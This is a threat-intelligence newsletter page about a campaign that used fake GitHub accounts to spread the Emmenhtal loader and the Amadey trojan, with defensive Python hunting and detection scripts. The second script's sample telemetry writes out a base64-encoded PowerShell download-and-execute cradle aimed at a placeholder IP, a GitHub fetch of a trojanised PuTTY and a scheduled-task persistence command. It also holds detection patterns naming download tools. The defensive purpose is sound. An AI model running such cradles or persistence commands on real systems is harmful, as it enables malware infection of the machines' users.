News from our Cybersecurity Expert Center

Contact us at infocyber@minsait.com

We bring you the latest cybersecurity news and alerts.

Vulnerabilities

A Meta AI chatbot bug may have allowed access to private conversations
malwarebytes.com

Oracle fixes 309 vulnerabilities in its July patch update
cybersecuritynews.com

Cybersecurity

$27 million stolen from BigONE exchange after cyberattack
bleepingcomputer.com

3.3 million Anne Arundel Dermatology patient records exposed after unauthorized database access
bankinfosecurity.com

Malware

Threat actors target Exchange servers in government environments across Asia using the GhostContainer backdoor
securelist.com

Chinese threat actors attack Taiwan's semiconductor sector with Cobalt Strike and custom backdoors
thehackernews.com

Latest threats detected

New malware campaign uses GitHub repositories

21/07/2025

Executive Summary

A new malware campaign has been detected that uses public GitHub repositories to distribute the Emmenhtal loader (also tracked as PEAKLIGHT), which in turn fetches the Amadey trojan and further stealers and RATs.

Data

Type: Malware
TLP: White

Objectives

Targets: Multiple
Affected assets: Multiple
Attack vector: Multiple

Tags: stealer, Amadey, Emmenhtal, GitHub, malware

Description

A new malware campaign has been detected in which threat actors use public GitHub repositories as distribution infrastructure, taking advantage of the trust placed in a legitimate platform that traditional security controls rarely block. The campaign centres on the Emmenhtal loader, which then downloads the Amadey trojan and remote access trojans (RATs).

 

Technical Details

A malicious campaign has been uncovered in which threat actors use public GitHub repositories to host and distribute the loader known as Emmenhtal (also tracked as PEAKLIGHT). The loader downloads and executes Amadey, a trojan that steals information and also acts as a dropper for further payloads. The actors created several fake GitHub accounts with names such as Legendary99999, DFfe9ewf, Milidmdds and bruhbruh9999 and uploaded malicious binaries disguised as legitimate software. The files were presented as plugins or useful tools but in fact carried secondary payloads such as information stealers and RATs like AsyncRAT. GitHub has since taken the repositories down, but the technique shows how attackers abuse legitimate, widely trusted platforms to slip past traditional security controls that do not block them.

Emmenhtal not only downloads Amadey directly from GitHub but also uses PowerShell scripts and trojanised copies of popular applications such as PuTTY to run its payloads. In some cases the PowerShell scripts fetch the next stage from hardcoded IP addresses, which keeps the attackers in control of the infection chain. A Python-written variant of the loader was also observed, with the same download-and-execute logic. Beyond Amadey, these loaders delivered additional modules that capture screenshots, collect browser credentials and steal data from Telegram and VPN clients.
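The account-based distribution described above lends itself to a network-side hunt. The following Python script is an added example written for this newsletter, not tooling from the report or from the researchers it cites. It parses a constructed proxy log (the two GitHub account names are those cited above; the clients, repositories, file names and the 203.0.113.45 server are made up), treats payload-type downloads from GitHub accounts outside a hypothetical allowlist or from bare IP addresses as findings, and ignores ordinary browsing of the same repositories.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed sample proxy log (not real telemetry). Fields: time client method url status bytes.
# The two GitHub account names are those cited in the report; clients, repositories, file
# names and the 203.0.113.45 server are made up for this example.
SAMPLE_PROXY_LOG = """\
2025-07-21T09:12:01Z 10.1.4.22 GET https://github.com/acme-devtools/build-agent/releases/download/v2.1/agent.zip 200 48213
2025-07-21T09:13:44Z 10.1.4.22 GET https://raw.githubusercontent.com/Legendary99999/Plugins/main/plugin_installer.exe 200 911232
2025-07-21T09:13:52Z 10.1.4.22 GET https://github.com/Milidmdds/tools/raw/main/update.ps1 200 2048
2025-07-21T09:14:10Z 10.1.4.22 GET http://203.0.113.45/files/putty.exe 200 1540096
2025-07-21T09:20:03Z 10.1.4.31 GET https://github.com/acme-devtools/build-agent/blob/main/README.md 200 3011
"""

# Hypothetical allowlist: the accounts this organisation's developers legitimately pull from.
ALLOWLISTED_ACCOUNTS = {"acme-devtools"}

# File types the loader chain on this page is delivered as: binaries, scripts, archives.
PAYLOAD_EXTENSIONS = (".exe", ".dll", ".scr", ".msi", ".bat", ".ps1", ".py", ".zip", ".rar", ".7z")

LINE_RE = re.compile(r"^(\S+) (?P<client>\S+) (\S+) (?P<url>\S+) (\d{3}) (\d+)$")


def github_download(url):
    """Return (account, filename) when url is a GitHub file download, else None.

    Covers release assets, raw.githubusercontent.com and github.com/.../raw/... links, the
    forms a download cradle is pointed at. Browsing URLs (blob, tree, repo root) return None.
    """
    u = urlparse(url)
    parts = [p for p in u.path.split("/") if p]
    if u.hostname == "raw.githubusercontent.com" and len(parts) >= 4:
        return parts[0], parts[-1]
    if u.hostname == "github.com" and len(parts) >= 5 and (
        parts[2:4] == ["releases", "download"] or parts[2] == "raw"
    ):
        return parts[0], parts[-1]
    return None


def is_bare_ip(host):
    """True when the host part of a URL is a literal IP address rather than a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def hunt_github_downloads(log_text, allowlisted_accounts):
    """Flag payload-type downloads from non-allowlisted GitHub accounts or bare IPs."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed row: skip, a hunt over millions of lines must not crash here
        url = m.group("url")
        parsed = urlparse(url)
        if not parsed.path.lower().endswith(PAYLOAD_EXTENSIONS):
            continue  # README, web pages, API calls: not what the loader fetches
        gh = github_download(url)
        if gh and gh[0] not in allowlisted_accounts:
            findings.append({"client": m.group("client"), "url": url, "account": gh[0],
                             "reason": "payload from non-allowlisted GitHub account"})
        elif gh is None and is_bare_ip(parsed.hostname or ""):
            findings.append({"client": m.group("client"), "url": url, "account": None,
                             "reason": "payload fetched directly from an IP address"})
    return findings


if __name__ == "__main__":
    for f in hunt_github_downloads(SAMPLE_PROXY_LOG, ALLOWLISTED_ACCOUNTS):
        print(f"{f['client']}  {f['reason']}: {f['url']}")
```

The allowlist is keyed on the account rather than the host because blocking github.com outright is rarely an option where developers work; a throwaway account uploading an .exe is the signal, not GitHub itself. Keep the extension list in step with what the proxy actually sees (archives and scripts, not only .exe), since the campaign shipped PowerShell and Python loaders as well as binaries.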

 

Recommendations

Protection

  • Use security tools (antivirus, EDR, etc.) capable of detecting suspicious behaviour rather than only known file hashes, since the same loader was uploaded under several throwaway GitHub accounts.
  • Treat downloads from code-hosting platforms (GitHub release assets, raw file URLs) as untrusted: where developers need GitHub, allowlist the accounts and repositories they use and alert on executable downloads from any other account.
  • Maintain an up-to-date inventory of all assets.
  • Conduct employee awareness campaigns on proper information handling, including not installing "plugins" or "tools" offered through unfamiliar repositories.
  • Limit the use of external storage devices.
  • Deploy Data Loss Prevention (DLP) systems to prevent information leakage.
  • Restrict the use of browser extensions, as they may be exploited by attackers for data exfiltration.
 

Detection

  • Analyze temporary and user-writable folders (%TEMP%, %APPDATA%, %LOCALAPPDATA%) as well as system folders (%SystemRoot%\System32) for recently dropped executables and scripts.
  • Monitor active processes and services for unusual behaviour, in particular PowerShell or Python processes that download and execute files, and executables launched from user-writable paths.
  • Inspect the machine's network traffic for suspicious communications (e.g., active sessions, NetBIOS connections), including downloads of executables from raw.githubusercontent.com, from release assets of unknown GitHub accounts, or from bare IP addresses.
  • Examine scheduled tasks on the systems, especially tasks whose action points at a user-writable path.
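To make the detection points above concrete, here is an added Python example (not from the original advisory, and not the vendors' detection content) that runs those checks over a handful of constructed Sysmon-style process-creation events. It decodes PowerShell -EncodedCommand arguments before matching, so a base64-wrapped download cradle fetching from a hardcoded IP or a raw GitHub URL is still caught; it also flags executables launched from user-writable folders by a script host, and scheduled tasks whose action points at such a path. The DFfe9ewf account and the PuTTY lure come from the report; hostnames, paths, PIDs and the 203.0.113.45 address are constructed.

```python
import base64
import binascii
import re
from ipaddress import ip_address

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed sample telemetry (not real logs), shaped like Sysmon Event ID 1 fields.
# Stage 1 is wrapped in -EncodedCommand so the decoder below has something to unwrap.
_STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.45/update.ps1')"
_ENC = base64.b64encode(_STAGE1.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"pid": 4120, "image": PS, "parent_image": r"C:\Users\alice\Downloads\plugin_installer.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {_ENC}"},
    {"pid": 4133, "image": PS, "parent_image": PS,
     "command_line": "powershell.exe -Command \"Invoke-WebRequest "
                     "https://raw.githubusercontent.com/DFfe9ewf/Plugins/main/putty.exe -OutFile $env:TEMP\\putty.exe\""},
    {"pid": 4150, "image": r"C:\Users\alice\AppData\Local\Temp\putty.exe", "parent_image": PS,
     "command_line": r"C:\Users\alice\AppData\Local\Temp\putty.exe"},
    {"pid": 4162, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\putty.exe",
     "command_line": r"schtasks.exe /create /tn Updater /sc minute /mo 5 /tr C:\Users\alice\AppData\Roaming\svc.exe"},
    {"pid": 5001, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -Command Get-Process"},
    {"pid": 5002, "image": r"C:\Program Files\Git\bin\git.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "git.exe pull"},
]

SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "python.exe", "pythonw.exe", "wscript.exe", "cscript.exe")
# powershell.exe accepts -e, -ec, -en, -enc and -encodedcommand; all take base64 of UTF-16LE text.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")
DOWNLOAD_RE = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|\bcurl\b|\bwget\b")
URL_RE = re.compile(r"(?i)https?://([^/\s'\"]+)")
STAGING_RE = re.compile(r"(?i)\\(?:appdata|temp|downloads|programdata|public)\\")


def decode_encoded_command(cmd):
    """Expand a -EncodedCommand argument so the download cradle inside it can be matched."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return cmd  # not valid base64/UTF-16LE: keep the command line as observed
    return cmd[:m.start(1)] + decoded


def suspicious_host(host):
    """Sources seen in this campaign: bare IP addresses and GitHub-hosted files."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return host.lower() in ("raw.githubusercontent.com", "github.com")


def classify(event):
    """Return (rule, detail) when the event matches one of the campaign behaviours, else None."""
    image, parent = event["image"].lower(), event["parent_image"].lower()
    cmd = decode_encoded_command(event["command_line"])
    if image.endswith(SCRIPT_HOSTS) and DOWNLOAD_RE.search(cmd):
        hosts = [h for h in URL_RE.findall(cmd) if suspicious_host(h)]
        if hosts:
            return "download_cradle", f"fetches from {', '.join(hosts)}: {cmd}"
    if image.endswith(".exe") and STAGING_RE.search(image) and parent.endswith(SCRIPT_HOSTS):
        return "staged_payload", f"{image} launched by {parent}"
    if image.endswith("schtasks.exe") and "/create" in cmd.lower() and STAGING_RE.search(cmd):
        return "persistence_task", cmd
    return None


def detect(events):
    """Run classify() over process-creation events and collect the alerts."""
    alerts = []
    for ev in events:
        hit = classify(ev)
        if hit:
            alerts.append({"pid": ev["pid"], "rule": hit[0], "detail": hit[1]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"pid {a['pid']:>5}  {a['rule']:<16} {a['detail']}")
```

The same chain shows up four times here (encoded stage 1 from a hardcoded IP, a clear-text fetch of a trojanised PuTTY from GitHub, that binary running out of %TEMP%, and a scheduled task pointing back into %APPDATA%), which is the point of correlating the bullets rather than alerting on any one of them: a single PowerShell download from GitHub is common on a developer workstation, a download followed by an execute-from-Temp and a schtasks /create is not.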

 

Mitigation

  • Isolate compromised devices to prevent malware from spreading across the network.
  • Because the stealer modules harvest browser credentials and Telegram and VPN data, reset the credentials and sessions stored on an infected host and revoke any VPN access it held.
  • Remove any persistence the loader created (e.g., scheduled tasks) before returning the device to service, or reimage it.

 

References

https://thehackernews.com/2025/07/hackers-use-github-repositories-to-host.html

We promote the transformation of business and society through innovative solutions and services, putting people at the center.

minsait.com

Indra is one of the leading global technology and consulting companies: the technology partner for key operations of client businesses worldwide.

indracompany.com
